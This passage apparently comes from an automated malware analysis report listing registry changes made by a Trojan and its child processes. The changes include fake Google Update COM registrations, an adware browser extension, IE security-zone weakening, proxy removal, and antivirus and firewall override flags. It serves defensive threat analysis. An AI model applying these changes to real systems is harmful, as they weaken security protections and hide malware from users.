"(Default)" = "IAppWeb"

[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"

[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"

[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"

[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"

[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"

[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"

[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"

[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"

[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"

[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"

[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"

[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"

[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"

[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"

[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"

[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"

[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"

[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"

[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process GoogleUpdate.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"

[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"

[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"

[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"

[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"

[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 9D 5B 2C 25 22 B6 61 FA EC BE 47 B7 0C F6 F1"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"

[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"

[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"

[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"

[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"

[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"

[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"

[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"

[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"

[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"

The Trojan deletes the following registry key(s):

[HKCR\AppID\GoogleUpdate.exe]

The process GoogleUpdate.exe:2364 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 18 34 09 4C C7 E6 81 D7 1A AA 6A A0 D2 1D 06"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"

The process GoogleUpdate.exe:2356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 50 26 F1 F0 98 AB 00 17 4C 40 9D 67 39 12 4B"

[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"

The process 772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 8B 23 88 65 65 F9 5D 2D BE 45 A6 87 AB C1 8A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process Iufkopcpdfjpcg.exe:424 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\extensionData\,"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Name" = "Freeven"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\InstalledBrowserExtensions\Freeven]
"54246" = "MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"Publisher" = "Freeven"

[HKCU\Software\InstalledBrowserExtensions\21636]
"54246" = "MPlayerplus_01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCU\Software\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"UninstallString" = "%Program Files%\MPlayerplus_01\Uninstall.exe /fcp=1"
"DisplayName" = "MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Verifier" = "60aa827dc6ab7283db367fb7eb2cda1a"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppName" = "MPlayerplus_01-bg.exe"

[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Bic" = "EAEB041DFB674B59BB4BCF5DE150DAB5IE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppPath" = "%Program Files%\MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"DisplayVersion" = "1.34.5.12"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"Policy" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"CrPublisherId" = "21636"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppPath" = "%Program Files%\MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"CrAppId" = "54246"

[HKLM\SOFTWARE\MPlayerplus_01\Installer]
"BundledChrome" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppName" = "MPlayerplus_01-bg.exe"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"srcid_var" = "001359"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"DisplayIcon" = "%Program Files%\MPlayerplus_01\utils.exe"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppName" = "MPlayerplus_01-codedownloader.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppName" = "MPlayerplus_01-codedownloader.exe"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21636]
"54246" = "MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 9B AC B7 08 AE 3C 95 8A CB 9E E3 B4 AF DF 7B"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"MPlayerplus_01-bg.exe" = "8000"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppPath" = "%Program Files%\MPlayerplus_01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"pv" = "1.3.25.0"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppPath" = "%Program Files%\MPlayerplus_01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\MPlayerplus_01\Installer]
"BundledFirefox" = "1"
"BundledIe" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"Policy" = "3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

The process MPlayerplus_01-bg.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 66 9A 82 C6 A9 5C 2A BA 11 AA 66 12 93 F0 B4"

The process 772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 B8 6F 84 AA 5F DB F5 AC 99 5D CC C9 A8 C4 88"

The process %original file name%.exe:688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Aas]
"a4_440" = "3154413240"
"a3_694" = "697136351"
"a2_348" = "2494852663"
"a2_349" = "2502018958"
"a2_346" = "2480517434"
"a2_347" = "2487687425"
"a2_344" = "2466170459"
"a2_345" = "2473349206"
"a2_342" = "2451833014"
"a2_343" = "2459002071"
"a2_340" = "2437499380"
"a2_341" = "2444662296"
"a2_180" = "1290440362"
"a2_181" = "1297602767"
"a2_182" = "1304788269"
"a2_183" = "1311955815"
"a2_184" = "1319124367"
"a2_185" = "1326289542"
"a2_186" = "1333458657"
"a2_187" = "1340623160"
"a2_188" = "1347792160"
"a2_189" = "1354960161"
"a4_444" = "3183089724"
"a3_789" = "1344615644"
"a3_788" = "1371246781"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKCU\Software\Aas]
"a2_749" = "1074705966"
"a2_742" = "1024512356"
"a2_743" = "1031684630"
"a2_740" = "1010184819"
"a2_741" = "1017353326"
"a2_746" = "1053202893"
"a2_747" = "1060372337"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a2_745" = "1046020652"
"a1_503" = "3994623438"
"a1_502" = "2625696392"
"a1_501" = "1097175946"
"a1_500" = "3593083589"
"a1_507" = "3455656332"
"a1_506" = "1518301959"
"a1_505" = "1186462203"
"a1_504" = "2339679818"
"a1_509" = "1785822827"
"a1_508" = "27410977"
"a3_659" = "412749722"
"a3_658" = "405760891"
"a4_844" = "1755770828"
"a1_946" = "1970892090"
"a3_78" = "542637991"
"a3_79" = "549622726"
"a3_72" = "533156193"
"a3_73" = "506656128"
"a3_70" = "485103791"
"a3_71" = "525712590"
"a3_76" = "561686245"
"a3_77" = "568613636"
"a3_74" = "513568291"
"a3_75" = "554631746"
"a3_259" = "1873798154"
"a3_258" = "1866220523"
"a1_435" = "2888476118"
"a1_434" = "3074810568"
"a1_433" = "558333122"
"a1_432" = "2013215030"
"a1_431" = "3530835708"
"a1_430" = "929914560"
"a3_251" = "1782710578"
"a3_250" = "1809280147"
"a3_253" = "1830771188"
"a3_252" = "1789764949"
"a3_255" = "1844811446"
"a3_254" = "1837822487"
"a3_257" = "1825746760"
"a3_256" = "1818692393"
"a3_784" = "1308623673"
"a3_783" = "1335193222"
"a3_782" = "1328269927"
"a3_781" = "1287147972"
"a1_636" = "744229795"
"a3_321" = "2284435336"
"a3_320" = "2310935401"
"a3_323" = "2332478538"
"a3_322" = "2291869739"
"a3_325" = "2346910988"
"a3_324" = "2339397869"
"a3_327" = "2327338446"
"a3_326" = "2320415151"
"a3_329" = "2375379584"
"a3_328" = "2368468577"
"a3_971" = "2682835394"
"a1_729" = "2502649842"
"a1_728" = "29197973"
"a3_439" = "3130280062"
"a3_438" = "3123369951"
"a3_435" = "3101883130"
"a3_434" = "3094824539"
"a3_437" = "3149870012"
"a3_436" = "3142426397"
"a3_431" = "3106444646"
"a3_430" = "3065901255"
"a3_433" = "3087376952"
"a3_432" = "3113879961"
"a4_818" = "1569373682"
"a4_819" = "1576542803"
"a4_810" = "1512020714"
"a4_811" = "1519189835"
"a4_812" = "1526358956"
"a4_813" = "1533528077"
"a4_814" = "1540697198"
"a4_815" = "1547866319"
"a4_816" = "1555035440"
"a4_817" = "1562204561"
"a1_670" = "3561868675"
"a2_748" = "1067543083"
"a1_593" = "3124866917"
"a3_94" = "690598327"
"a3_95" = "698045910"
"a3_96" = "671534665"
"a3_97" = "678453992"
"a3_90" = "662052915"
"a3_91" = "669107282"
"a3_92" = "643004661"
"a3_93" = "649993492"
"a3_98" = "685967115"
"a3_99" = "726580138"
"a4_605" = "42350909"
"a4_604" = "35181788"
"a4_607" = "56689151"
"a4_606" = "49520030"
"a4_601" = "13674425"
"a4_600" = "6505304"
"a4_603" = "28012667"
"a4_602" = "20843546"
"a4_979" = "2723602163"
"a4_978" = "2716433042"
"a4_609" = "71027393"
"a4_608" = "63858272"
"a1_987" = "241353365"
"a1_986" = "618529064"
"a1_985" = "3435510135"
"a1_984" = "905895076"
"a1_983" = "421682490"
"a1_982" = "1322042214"
"a1_981" = "1979044346"
"a1_980" = "1270819567"
"a1_989" = "1028911139"
"a1_988" = "1943603761"
"a3_869" = "1918293868"
"a2_744" = "1038850617"
"a1_855" = "3217855051"
"a3_655" = "383827462"
"a1_857" = "2160582624"
"a1_856" = "3871757978"
"a1_851" = "2694477355"
"a1_850" = "199431336"
"a1_853" = "3964469857"
"a3_654" = "376767975"
"a1_859" = "3655691317"
"a3_657" = "431879896"
"a4_779" = "1289777963"
"a4_778" = "1282608842"
"a3_929" = "2381983272"
"a3_656" = "424825529"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"

[HKCU\Software\Aas]
"a4_771" = "1232424995"
"a3_651" = "388835458"
"a4_773" = "1246763237"
"a4_772" = "1239594116"
"a4_775" = "1261101479"
"a4_774" = "1253932358"
"a4_777" = "1275439721"
"a3_650" = "348370019"
"a3_653" = "369779012"
"a3_652" = "395889957"
"a4_151" = "1082537271"
"a4_150" = "1075368150"
"a4_153" = "1096875513"
"a4_152" = "1089706392"
"a4_155" = "1111213755"
"a4_154" = "1104044634"
"a4_157" = "1125551997"
"a4_156" = "1118382876"
"a4_159" = "1139890239"
"a4_158" = "1132721118"
"a1_185" = "1203113420"
"a1_184" = "143343863"
"a1_183" = "3740399901"
"a1_182" = "3318210109"
"a1_181" = "1661917115"
"a1_180" = "2134795656"
"a1_963" = "2859192252"
"a4_559" = "4007538639"
